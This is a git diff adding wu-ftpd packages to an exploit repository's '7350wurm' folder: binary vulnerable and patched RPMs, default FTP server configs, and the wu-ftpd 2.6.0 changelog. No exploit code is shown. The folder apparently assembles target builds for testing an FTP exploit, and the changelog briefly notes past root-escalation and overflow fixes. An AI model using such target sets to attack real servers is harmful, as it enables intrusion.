diff --git a/exploits/7350wurm/rpm/immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm b/exploits/7350wurm/rpm/immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm
new file mode 100644
index 0000000..f0de147
--- /dev/null
+++ b/exploits/7350wurm/rpm/immunix62_wu-ftpd-2.6.0-3_StackGuard.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm b/exploits/7350wurm/rpm/patched/redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm
new file mode 100644
index 0000000..f08fcc5
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/redhat62update_wu-ftpd-2.6.1-0.6x.21.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm b/exploits/7350wurm/rpm/patched/redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm
new file mode 100644
index 0000000..4d790e5
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/redhat70update_wu-ftpd-2.6.1-16.7x.1.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm b/exploits/7350wurm/rpm/patched/redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm
new file mode 100644
index 0000000..4d790e5
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/redhat71update_wu-ftpd-2.6.1-16.7x.1.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/redhat72update_wu-ftpd-2.6.1-20.i386.rpm b/exploits/7350wurm/rpm/patched/redhat72update_wu-ftpd-2.6.1-20.i386.rpm
new file mode 100644
index 0000000..5c1a133
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/redhat72update_wu-ftpd-2.6.1-20.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/suse63update_wuftpd-2.6.0-347.i386.rpm b/exploits/7350wurm/rpm/patched/suse63update_wuftpd-2.6.0-347.i386.rpm
new file mode 100644
index 0000000..b39011f
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/suse63update_wuftpd-2.6.0-347.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/suse64update_wuftpd-2.6.0-344.i386.rpm b/exploits/7350wurm/rpm/patched/suse64update_wuftpd-2.6.0-344.i386.rpm
new file mode 100644
index 0000000..32e618b
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/suse64update_wuftpd-2.6.0-344.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/suse70update_wuftpd-2.6.0-344.i386.rpm b/exploits/7350wurm/rpm/patched/suse70update_wuftpd-2.6.0-344.i386.rpm
new file mode 100644
index 0000000..aef3a1a
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/suse70update_wuftpd-2.6.0-344.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/suse71update_wuftpd-2.6.0-346.i386.rpm b/exploits/7350wurm/rpm/patched/suse71update_wuftpd-2.6.0-346.i386.rpm
new file mode 100644
index 0000000..0704a70
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/suse71update_wuftpd-2.6.0-346.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/suse72update_wuftpd-2.6.0-344.i386.rpm b/exploits/7350wurm/rpm/patched/suse72update_wuftpd-2.6.0-344.i386.rpm
new file mode 100644
index 0000000..6810a18
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/suse72update_wuftpd-2.6.0-344.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/patched/suse73update_wuftpd-2.6.0-344.i386.rpm b/exploits/7350wurm/rpm/patched/suse73update_wuftpd-2.6.0-344.i386.rpm
new file mode 100644
index 0000000..0706b1b
--- /dev/null
+++ b/exploits/7350wurm/rpm/patched/suse73update_wuftpd-2.6.0-344.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm b/exploits/7350wurm/rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm
new file mode 100644
index 0000000..275f5aa
--- /dev/null
+++ b/exploits/7350wurm/rpm/redhat60_wu-ftpd-2.4.2vr17-3.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm b/exploits/7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm
new file mode 100644
index 0000000..ef2b614
--- /dev/null
+++ b/exploits/7350wurm/rpm/redhat61_wu-ftpd-2.5.0-9.i386.rpm
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz
new file mode 100644
index 0000000..87a9c99
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0.tgz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess
new file mode 100644
index 0000000..26c5239
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpaccess
@@ -0,0 +1,24 @@
+class   all   real,guest,anonymous  *
+email root@localhost
+loginfails 5
+readme  README*    login
+readme  README*    cwd=*
+message /welcome.msg            login
+message .message                cwd=*
+compress        yes             all
+tar             yes             all
+chmod           no              guest,anonymous
+delete          no              guest,anonymous
+overwrite       no              guest,anonymous
+rename          no              guest,anonymous
+log transfers anonymous,real inbound,outbound
+shutdown /etc/shutmsg
+passwd-check rfc822 warn
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions
new file mode 100644
index 0000000..4fda5df
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpconversions
@@ -0,0 +1,7 @@
+ :.Z:  :  :/bin/compress -d -c %s:T_REG|T_ASCII:O_UNCOMPRESS:UNCOMPRESS
+ :   : :.Z:/bin/compress -c %s:T_REG:O_COMPRESS:COMPRESS
+ :.gz: :  :/bin/gzip -cd %s:T_REG|T_ASCII:O_UNCOMPRESS:GUNZIP
+ :   : :.gz:/bin/gzip -9 -c %s:T_REG:O_COMPRESS:GZIP
+ :   : :.tar:/bin/tar -c -f - %s:T_REG|T_DIR:O_TAR:TAR
+ :   : :.tar.Z:/bin/tar -c -Z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+COMPRESS
+ :   : :.tar.gz:/bin/tar -c -z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+GZIP
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups
new file mode 100644
index 0000000..ec39822
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpgroups
@@ -0,0 +1 @@
+# test:ENCRYPTED PASSWORD HERE:archive
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts
new file mode 100644
index 0000000..9ccbd6d
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftphosts
@@ -0,0 +1,5 @@
+# Example host access file
+#
+# Everything after a '#' is treated as comment,
+# empty lines are ignored
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers
new file mode 100644
index 0000000..856df2f
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/ftpusers
@@ -0,0 +1,14 @@
+root
+bin
+daemon
+adm
+lp
+sync
+shutdown
+halt
+mail
+news
+uucp
+operator
+games
+nobody
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd
new file mode 100644
index 0000000..7728381
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/logrotate.d/ftpd
@@ -0,0 +1,4 @@
+/var/log/xferlog {
+    # ftpd doesn't handle SIGHUP properly
+    nocompress
+}
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp
new file mode 100644
index 0000000..d3c383a
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/etc/pam.d/ftp
@@ -0,0 +1,6 @@
+#%PAM-1.0
+auth       required     /lib/security/pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed
+auth       required     /lib/security/pam_pwdb.so shadow nullok
+auth       required     /lib/security/pam_shells.so
+account    required     /lib/security/pam_pwdb.so
+session    required     /lib/security/pam_pwdb.so
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount
new file mode 100755
index 0000000..2e763f2
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpcount
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho
new file mode 100755
index 0000000..2e763f2
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/bin/ftpwho
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES
new file mode 100644
index 0000000..375ee36
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/CHANGES
@@ -0,0 +1,2865 @@
+ 
+  Copyright (c) 1999 WU-FTPD Development Group.  
+  All rights reserved.
+  
+  Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994
+    The Regents of the University of California.
+  Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.
+  Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.
+  Portions Copyright (c) 1989 Massachusetts Institute of Technology.
+  Portions Copyright (c) 1998 Sendmail, Inc.
+  Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P.  Allman.
+  Portions Copyright (c) 1997 Stan Barber.
+  Portions Copyright (c) 1997 Kent Landfield.
+  Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997
+    Free Software Foundation, Inc.  
+ 
+  Use and distribution of this software and its source code are governed 
+  by the terms and conditions of the WU-FTPD Software License ("LICENSE").
+ 
+  If you did not receive a copy of the license, it may be obtained online
+  at http://www.wu-ftpd.org/license.html.
+ 
+  $Id: CHANGES,v 1.40 1999/10/17 00:50:22 wuftpd Exp $
+Changes in 2.6.0: Released 18 Oct, 1999
+ o  On sigpipe, always log a lost connection.
+ o  Added a log message on attempts to download files marked unretrievable.
+ o  The SITE NEWER feature has been disabled.  A compile-time option has been
+    added to re-enable it.  See config.h.noac for more information on this.
+ o  With restricted-uid/gid, CWD to a non-existant directory would display the
+    full pathname rather than just relative to the user's home.  Actually, the
+    fix catches most cases where this could occur, not just the CWD verb.
+ o  Fixed a bug in the restricted-uid/gid feature which could allow access
+    outside the user's home directory in some cases.
+ o  Bumped MAXHST (max. hosts allowed on a line) for ftphosts from 10 to 12.
+    Fixed a bug related to this which can cause the server to crash checking
+    host access.
+ o  The internal ls (see below) was judged to be unready.  It has been disabled
+    by default but can be enabled with a compile-time option for those who wish
+    to attempt to debug it (be warned, it has a lot of problems).
+ o  Split the "bad shell or user not in ftpusers" syslog message into two
+    messages to prevent confusion.
+ o  Filename globs for LIST, NLST and SITE EXEC, as well as a few internal
+    uses, are cleaned up before processing.  For example: */./../* becomes
+    just *.  This prevents certain memory starvation DoS attacks.
+ o  Corrections for RFC compliance can break some clients.  If possible, the
+    broken client should be updated, but a compile-time option has been
+    added.  See the config.h.noac for more information on this.
+ o  Created doc/HOWTO directory and moved VIRTUAL.FTP.SUPPORT and 
+    upload.configuration.HOWTO there.
+ o  Add a README.AUTOCONF file describing the autoconf build in detail.
+ o  UC, Berkeley, has removed the requirement that all advertising material
+    must include credit to them.  Removed the clause from the LICENSE and
+    the historical licenses in the COPYRIGHT file.
+ o  Added the email-on-upload feature from BeroFTPD.  See the ftpaccess man
+    page for defaults on these added ftpaccess clauses:
+        mailserver <hostname>
+        incmail <emailaddress>
+        mailfrom <emailaddress>
+        virtual <address> incmail <emailaddress>
+        virtual <address> mailfrom <emailaddress>
+        defaultserver incmail <emailaddress>
+        defaultserver mailfrom <emailaddress>
+ o  Redhat added the -I option to disable RFC931 (AUTH/ident).  Added to
+    the baseline so Redhat users don't see a loss of a feature.  Setting
+    the timeout for rfc931 to zero will do the same thing in the ftpaccess
+    file.
+ o  The test for whether restricted-uid/restricted-gid applied should have
+    been done before the chroot so it used the system /etc/passwd and
+    /etc/group files.
+ o  CDUP when you were already at the home directory, would complain about
+    you being restricted (if you were).  Instead it should give a positive
+    reply, and do nothing.  This makes it behave more like CDUP when you're
+    not restricted to your home directory.
+ o  deny-uid and deny-gid were being tested for anonymous users.  Bad move,
+    it's too easy to forget to allow them.  Use 'defaultserver private' to
+    keep anonymous users away.
+ o  Correct the operation of the NLST command.  Finally.  mget should now
+    work as users expect it to.
+ o  Prevent buffer overruns when processing message files.
+ o  Correct a reference through a NULL pointer when doing S/Key
+    authentication and the user is not in the passwd file.
+ o  Check the return code from select() when setting up a data connection.
+    Under some rare conditions it is possible that the select was called
+    for an fd_set which has no members, hanging the daemon.
+ o  Ensure a pattern of "*" matches everything.  The new path_compare (used
+    on upload and throughput clauses in the ftpaccess file) sets the option
+    FNM_PATHNAME, so:
+        *    matches everything
+        /*   matches everything
+        /*/* matches /dogs/toto and /dogs/toto/photos but not /dogs
+ o  setproctitle() support added for UnixWare.
+ o  Removed all FIXES files.  Merged their contents into this CHANGES file
+    (the one you're reading now).  The old doc/FIXES directory has been
+    tar'd and will be placed in the attic when 2.6.0 releases.
+ o  Corrected an error in the MAPPING_CHDIR feature which could be used to
+    gain root privileges on the server.
+ o  Added -V command-line option to View the copyright and exit.
+ o  Added the privatepw command and documentation.
+ o  Port for FreeBSD corrected.
+ o  Adding the LICENSE file to the baseline.
+ o  Added print_copyright function so our copyright is embedded in the
+    executables.
+ o  WU-FTPD Development Group copyright headers added.  Original Copyright
+    headers moved into the COPYRIGHT file.
+ o  RCS Ids from 2.4.x removed and new templates added for wu-ftpd.org
+    usage.
+ o  Make sure the signal context is restored when jumping out of signal
+    handlers.  This was causing signal 11 on some systems.
+ o  Cleaned up the how-to of setting up virtual hosting support.
+ o  Corrected header file dependencies.
+ o  Changed NLST to nlst, necessary as ftpcmd.c #defines NLST.
+ o  Tidied up virtual variables.
+ o  Changed so compiles cleanly on SCO OpenServer 5, UnixWare 2 and
+    UnixWare 7.
+ o  Anonymous users could get in even though no class was defined for them.
+ o  Support for non-ANSI/ISO compilers has been removed.  You MUST have and
+    ANSI/ISO C compiler.  This has been true for some time, all that has
+    changed is the (incomplete) support for older (K&R) compilers has been
+    removed.
+ o  Added Kent Landfield's NEWVIRT scheme for extensive virutal hosting.
+    See the updated documentation on virtual hosting for details.
+ o  ftprestart has been added to the base daemon kit.
+ o  A buffer overrun in the ftpshut command has been corrected.  Since, on
+    most sites, the ftpshut command is only usable by the superuser, this
+    is not considered a security issue.  If you have installed ftpshut with
+    suid-root permissions (not the default), then there is the possibility
+    this overrun could be used to leverage root permissions.
+ o  Several new ftpaccess clauses have been added.  These allow control of
+    the various timeouts used within the daemon.  The new clauses are:
+        timeout accept <seconds>
+        timeout connect <seconds>
+        timeout data <seconds>
+        timeout idle <seconds>
+        timeout maxidle <seconds>
+        timeout RFC931 <seconds>
+ o  Myriad places where inactivity timeouts were not being properly
+    detected or handled have been corrected.
+        The built-in directory listings, both the original NLST and the
+        build-in LIST (ls), now detect inactivity.  The original NLST did
+        not which could lead to hanging daemons.
+        C FILE handles for data connections are now always flushed, then
+        the socket is shutdown cleanly before being closed.
+        As a side effect, the daemon now more often properly detects
+        incomplete transfers.  This can lead, though, to the xferlog
+        showing the correct byte count (meaning the daemon read or wrote
+        that many bytes over the data connection), but still log the
+        transfer as incomplete (meaning the socket did not properly
+        shutdown so the client probably missed some data).
+ o  The daemon no longer attempts to replace the system's <arpa/ftp.h>
+    header when compiling.  Instead, it uses its own local copy at all
+    times.
+ o  The daemon will now wait for the transfer to complete before sending
+    'Transfer complete' or similar messages.  This improves the daemon's
+    reliability for poorly written clients which take recipt of the message
+    as indication the transfer has completed rather than reading until the
+    connection closes.
+ o  Guest and anonymous logout was not recorded on Linux.  Removed call to
+    updwtmp and returned to old method of updating the lastlog.
+ o  Script "vr.sh" is no longer needed.  The Development Group will not be
+    releasing patches to upgrade; they can be obtained from CVS if needed.
+ o  "realpath_on_steroids" is no longer needed.  Removed.
+ o  Use a custom version of fnmatch() which changes the rules for matching
+    file and directory names.  The most visible result of this is
+    noretrieve and allow-retrieve are now much more flexible.  See the
+    ftpaccess manpage for examples.
+ o  Use the correct SPT_TYPE for FreeBSD 2.0 or later.
+ o  Correct the class= logic on the allow-retrieve clause.
+ o  Enhanced DNS extensions.  This adds three ftpaccess clauses:
+        dns refuse_mismatch <filename> [override]
+        dns refuse_no_reverse <filename> [override]
+        dns resolveroptions [options]
+ o  Corrected a reference in the manpage for ftpconversions to ftpd.
+ o  The string 'path-filter' is now used in the system logs to describe
+    problems resulting from failing a path-filter check.  The daemon used
+    to just say 'bad filename' which was misleading to some people.
+ o  Added instruction on how to support PAM on Solaris.  Right now this
+    means hand editing src/config/config.sol and
+    src/makefiles/Makefile.sol.
+ o  Checking that all platforms use config.h, src/config/config.isc was
+    found to have forgotten to include the file.
+ o  A security deficency on SunOS 4.1, not having a working getcwd()
+    function, has been corrected by using the provided function.
+    Compilation bugs in the portable getcwd() function have been corrected.
+ o  The daemon will no longer hang attempting to close the RFC931 socket
+    when the remote end is firewalled and does not respond to traffic for
+    this protocol.  This was determined to be inappropriate handling of
+    SIGALRM; handling for this signal has been cleaned up throughout the
+    daemon.
+ o  The daemon may now be built using GNU autoconf.  This is in the early
+    stages and not all platforms may be supported.  The old build system
+    will be maintained for at least the 2.6.0 release; until the major
+    platforms are all known to be supported.
+ o  Two new ftpaccess clauses have been added.  These allows the site admin
+    to selectively allow PORT and PASV data connections where the remote IP
+    address does not match the remote IP address on the control connection.
+    The new clauses are:
+        port-allow <class> [<addrglob> ...]
+        pasv-allow <class> [<addrglob> ...]
+ o  The daemon now includes an internal 'ls' command.
+ o  Ported to Mac OS/X.
+ 0  Added (limited) support for AFS and DCE user authentication.  This is
+    only know to work on AIX, and needs porting to other platforms.  For
+    now, this requires hand work to enable.
+ o  Added an ftpaccess clause to enable TCP keepalives.  This clause is:
+        keepalive <yes|no>
+ o  You can now specify the xferlog filename for the default server just as
+    you can for the virtual hosts; in the ftpaccess file.  The new clause
+    is:
+        xferlog <absolute path>
+ o  ftpaccess manpage cleaned up.  Many typos corrected, some techincal
+    changes.  Indentation should now be correct.
+ o  Apache's .indent.pro to the src and support directories.  Ran all *.c
+    and *.h files through it.  ftpcmd.y has been indented by hand.  The
+    code is now a lot more readable!
+ o  A bug in the parsing for the deny !nameserved ftpaccess clause has been
+    corrected.
+ o  Technical corrections in the ftpd manpage.
+ o  Add util/recompress.c as a more generic version of gzip2cmp.c
+###########################################################################
+Changes in 2.5.0: Released 25 May, 1999
+ o  Change the handling of wtmp for GNU libc to use the Os-provided
+    function updwtmp().
+ o  Prevent some buffer overruns.
+ o  Fix permissions on some files installed by RPM, add the log rotation
+    control file.
+ o  Change the seteuid() calls for fchown() and chown() for POSIXLY_CORRECT
+    systems.
+ o  pid file locking in ftpcount (ftpwho) is now consistent with the way
+    the daemon locks these files.
+ o  Cancel any pending alarm request to stop acl_remove() from being
+    interrupted then called again via the SIGALRM handler, this should fix
+    the flock on a bad file descriptor looping problem.
+ o  Use %m in syslog format strings in place of %s and strerror(), this
+    simplifies #ifdefs.
+ o  For SCO, link ftpcount with libsocket, necessary as it now calls
+    syslog().
+ o  Added Redhat's RPM SPEC file for building RPMs.
+ o  English corrections in ftpaccess manpage.  Technical correction: the
+    noretrieve/allow-retrieve clauses do NOT support regular expressions.
+ o  Move where ftpglob stuff is defined to avoid compilation errors on some
+    systems.
+ o  Port to SGI Irix version 4 corrected.
+ o  Overwrite behavior on uploads has been made consistent with shell
+    usage.  The daemon does not change ownership or permissions on
+    overwrite.
+ o  Corrected the PASV command to bind to the correct interface (local IP
+    address).
+ o  Removed the OVERWRITE and UPLOAD defines from platform config files;
+    they are defined in the main config.h header.
+ o  Issuing CWD without any parameters caused a signal 11, crashing the
+    daemon.
+ o  Port to HP/UX corrected.
+ o  Added ERRATA file to discuss problems with getcwd().
+ o  Added a portable version of the getcwd() function for systems which do
+    not have it or imcorrectly implement it.  NextStep 3 uses this new
+    function.
+ o  OPIE support was being disabled even though the proper command-line
+    switches were being set.  Corrected the use of opieverify().
+ o  The fatal() function was not declared void; this was causing problems
+    with some compilers.
+ o  Port to Hitachi HI-UX corrected.
+ o  Some calls to fnmatch() were missing parameters.
+ o  Corrected the 'restricted' user feature.  It now works well with most
+    FTP clients.
+ o  Correct usage of -d vs -e in the install Makefile for a number of
+    platforms.
+ o  You can now use negated hostnames/addresses on the class ftpaccess
+    clause.
+ o  Added an ftpaccess clause to specify random text for the initial
+    greeting:
+        greeting text <message>
+ o  Corrected password encryption/checking for Digital Unix with C2
+    security (SECUREOSF).
+ o  Merged the TODO file from the VR series with Stan's TODO file for the
+    Academ betas.
+ o  Changed the various permission denial messages sent by the daemon to
+    the client to make it clear the message originated from the server.
+ o  Ports to SCO, Solaris, uxw, ptx and isc corrected.
+ o  Use the newer SEEK_ defines in place of the old BSD L_ defines and
+    removed the global definition of entry, each function should define it
+    locally.
+ o  Removed an unnecessary lseek(L_SET) in ftpcount (ftpwho).
+ o  Link ftpcount and ftpshut with ${XXLIBS}.
+ o  Made strsep() definition consistent with BSD and Linux.  Add strsep()
+    definition to conversions.c.
+ o  Added #include <string.h> to ckconfig.c.
+ o  Replaced the _PATH_DEVNULL define with a #include of "pathnames.h" in
+    popen.c.
+ o  Support long group access passwords if SecureWare or HPUX_10_TRUSTED
+    are defined (using bigcrypt()).
+ o  Fixed a memory leak in restrict.c.
+ o  Digital Unix version 4 has a working getcwd(); use it instead of
+    getwd().
+ o  Stop restrict_list_check() from walking off the end of name.
+ o  Added -x command-line option to mean 'log syslog+xferlog'.
+ o  Changed the log ftpaccess clause to allow logging transfers to both the
+    syslog and xferlog.  The log ftpaccess clauses now include:
+        log syslog
+        log xferlog
+        log syslog+xferlog
+ o  Formation of the WU-FTPD Development Group on 1 April, 1999.
+    2.4.2-VR17 chosen as initial baseline for the daemon.
+###########################################################################
+Changes in 2.4.2-VR17: Released 1 April, 1999
+ o  Gregory A Lundberg resigns as the de-facto maintainer of WU-FTPD.  "And
+    you thought I was joking."
+ o  VIRTUAL is now the default for Solaris; all Solaris systems support
+    multiple interfaces (IP addresses).
+ o  Fixed complaints involving virtual_len reported by several beta
+    testers.
+ o  Some of the 'C' source code in ftpcmd.y depended upon a particular
+    behavior when ANSI/ISO does not define it.  Corrected so all compilers
+    will properly interpret the code.
+ o  Corrected the support for QUOTA on Solaris.
+ o  The GNU EGCS 'C' compiler is broken.  A quick check and we can avoid
+    the brokenness.
+ o  Port to Ultrix corrected.
+ o  The default shell on NextStep wants -d instead of -e.  Changed to test
+    instead of [] since that's more portable; will probably do the same to
+    other systems in a future release.
+ o  MNTMAXSTR was possibly undefined on Digital Unix 4.0 even when not
+    using QUOTA_DEVICE, causing compilation errors.
+ o  Added daemonaddress to the ftpaccess manpage.
+ o  Added a note from Chad Price <cprice@molbio.unmc.edu> in src/logwtmp.c
+    about the brokenness of Solaris' last command.
+ o  It turns out that not all SunOS 4.1 boxes actually have a getcwd()
+    function.
+ o  The labels unix and __unix__ are depricated on BSD, effecting the logic
+    for the reponse to the SYST command.
+ o  Added an appnote about OPIE.  See src/makefiles/Makefile.lnx for a way
+    to automatically have the daemon use OPIE.  Send your Makefile if you
+    do something similar for your system.
+ o  Added an appnote about a problem experienced with Trusted Solaris.
+ o  Added doc/misc directory to start collecting interesting tidbits which
+    may help people get their servers going.
+ o  The FIXES files were really cluttering up the base directory.  Moved
+    them to a directory under doc.
+ o  The 'log security' ftpaccess clause covered all but a few messages
+    about filesystem operations.  It now covers the few it missed.
+ o  Under some conditions _PATH_WTMP was not being set in pathnames.h
+ o  QUOTA is now supported for Solaris.
+ o  Trusted Solaris needed additional functionality in ftpcount (ftpwho).
+ o  File locking in ftpcount (ftpwho) was never completed.
+ o  Port to HP/UX corrected.
+ o  'make install' now accepts DESTDIR to install into a directory
+    structure other than the root file system.  A number of other optional
+    parameters are available to override the default ownership of the
+    installed files.  Missing directories are automatically created.  File
+    permisssions were reduced to the minimum necessary.
+ o  Dead code removed.
+ o  The Makefile for Linux now automatically detects if PAM is installed
+    and compiles the daemon to use it.
+ o  Fix an uninitialized variable in ftpshut which could effect the way the
+    command works with default values.
+ o  Suppress trailing blanks from the output of a wide 'ps' in the ftpcount
+    (ftpwho) command.  Just making things pretty.
+ o  Updated upload.configuration.HOWTO to describe more of the
+    configuration having to do with class= rules and overwrite, delete and
+    rename clauses.
+ o  Added vers.c and edit to 'make cleandir' in the src directory.  These
+    files are automatically created during the build process.
+ o  Added a restrict_check(".") in the LIST command for consistency with
+    the remainder of the code in ftpcmd.y.
+ o  Corrected the 'restricted' users feature so it would play nicely with
+    web clients and the way some of them mis-interpret FTP URLs.
+###########################################################################
+Changes in 2.4.2-VR16: Released 4 March, 1999
+ o  The Makefile for hiu had a typo and would not install two manpages.
+ o  Merged 2.4.2-BETA-18-VR15 with 2.4.2 (final) from Academ.  Gotta love
+    CVS. :)
+ o  Gregory A Lundberg becomes the de-facto maintainer of WU-FTPD pending
+    the formation of the WU-FTPD Development Group.
+###########################################################################
+Changes in 2.4.2: Released 26 Febraury, 1999 (not announced)
+ o  With the release of 2.4.2, Stan Barber steps down as the maintainer of
+    WU-FTPD.
+ o  Documented that 'upload .. no' allowed directory creation.  See
+    doc/examples/ftpaccess.heavy as an example.  [Ed: This is not the case
+    for the VR series, but I'm including the change anyway.]
+ o  Clarification in the manpage for ftphosts: ftp or anonymous listed in
+    the file will disable anonymous ftp access.
+ o  Possible pointer overrun in acl.c parsing ftpaccess corrected.
+ o  Literal constant in ftpcmd.y changed to static to reduce program size.
+ o  ftpcount/ftpwho interpretation of start/stop times made to match the
+    way the daemon actually does it.
+ o  setproctitle() in ftpd.c updated to avoid a buffer overrun and handle
+    low memory conditions; SCO corrections.
+ o  Possible buffer overrun parsing 'virtual root' and 'virtual logfile'
+    corrected.
+ o  A timeout timer was being reset at the wrong point during STOR.
+ o  Corrections for Sun/Solaris paths in pathnames.h.
+ o  Makefile for DEC/Unix (dec and du4) changed from cc -std1 to cc -std.
+ o  Correction in syslog support for DEC/Unix in support/syslog.c.
+ o  util/xferstats corrected to parse your local domain name rather than
+    just assuming you're academ.com.
+ o  Other changes are white-noise or simply for style and do not effect the
+    operation of the daemon in any way.
+###########################################################################
+Changes in 2.4.2-BETA-18-VR15: Released 1 March, 1999
+ o  Provided a means to completely disable anonymous FTP access.  Done as a
+    compile-time option, see config.h
+ o  NLST with a directory ending with / doubled up the slash.  This had
+    been there for years.
+ o  Completed large file support for AIX.  To enable Large File support,
+    use './build aix LF=YES'
+ o  The stock compiler on SunOS 4.1 is breaindead.  Use gcc instead.  Also
+    found during trials that getcwd() works fine on s41 and enabled it.
+    Found that on a SunOS 4.1 using NFS in the FTP area, fchdir() doesn't
+    always work so if you have problems, #define HAS_NO_FCHDIR to see if
+    that helps.
+ o  Complete the changeover from SCO Unix to SCO OpenServer 5.
+ o  We really don't need to #undef NO_PRIVATE twice in config.h .. it just
+    confuses things.
+ o  The -X command-line option and 'log syslog' were not working as
+    documented.  The switch was re-initialized by the 'log' clauses.
+ o  Additional corrections for AIX 4.2 and large file support.  Earlier
+    versions of AIX may need to edit support/makefiles/Makefile.aix if they
+    don't have snprintf() or strdup().
+ o  Corrected a case where _PATH_XFERLOG may not be defined at all in
+    src/pathnames.h.
+ o  Code cleanup for the xferlog print which was changed in VR14.
+ o  A typo selected the wrong HELP_CRACKERS patch in one place.
+ o  Protect a #define conflict on NetBSD with #ifndef.
+ o  The reason the daemon won't work on AIX is the size_t_blksize change
+    made as an experiment way-back-when.  Backed out that change.  Let's
+    see what happens.
+ o  Corrected an error which caused AIX to sometimes report 0 for the
+    filesize when a download begins.
+ o  There were a number of places there was no check for errors from
+    alloc()/malloc()/calloc().
+ o  defumask was causing problems on HPUX.  Another case of mis-matched
+    definition/extern.
+ o  There were several places where int was being used and size_t was
+    correct.  This may, or may not, fix problems getting the daemon to work
+    on AIX.
+ o  Added the ability to restrict users to their home directories.  This
+    has the effect of doing a "soft" chroot and is best used with guest
+    users.  Several new ftpaccess clauses were added to support this:
+        restricted-uid <uid-range> [...]
+        restricted-gid <gid-range> [...]
+        unrestricted-uid <uid-range> [...]
+        unrestricted-gid <gid-range> [...]
